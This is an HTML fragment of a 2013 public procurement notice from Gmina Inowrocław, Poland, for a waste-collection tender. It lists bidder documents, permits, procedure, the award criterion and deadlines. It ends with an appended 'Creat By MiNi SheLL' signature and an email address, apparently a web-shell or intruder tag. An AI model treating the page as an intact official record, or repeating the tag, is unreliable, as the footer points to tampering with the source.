<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Pełnomocnictwo - jeśli dotyczy.
Dla uznania, że wykonawca spełnia warunek uprawnień do wykonywania określonej działalności, zamawiający wymaga, złożenia: 
a)	zezwolenia na zbieranie odpadów 
b)	zezwolenia na przetwarzanie odpadów, w przypadku wykonywania procesów odzysku lub unieszkodliwiania, w tym przygotowania poprzedzającego odzysk lub unieszkodliwianie
c)	aktualnego zaświadczenia o wpisie do rejestru działalności regulowanej w Gminie Inowrocław, zgodnie z art. 9 c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach,
d)	zezwolenia na transport odpadów wydane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001 r. (Dz. U. z 2010 Nr 185, poz. 1243 z późn. zm.), w związku z art. 233 ustawy z dnia 14 grudnia 2012 r. (Dz. U.z 2013 r. poz. 21)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy w zakresie odnoszącym się do ceny, terminu i sposobu realizacji, jest dopuszczalna w przypadku:
a)	zaistnienia nieprzewidywalnych okoliczności uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami lub obowiązującymi przepisami prawa,
b)	zmiany obowiązującej wysokości podatku od towarów i usług, w przypadku, gdy zmiana ta spowoduje zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Inowrocław, ul. Królowej Jadwigi 43, 88-100 Inowrocław, I. piętro, pok. 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 10:00, miejsce: Urząd Gminy Inowrocław, ul. Królowej Jadwigi 43, 88-100 Inowrocław, I piętro, pok. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com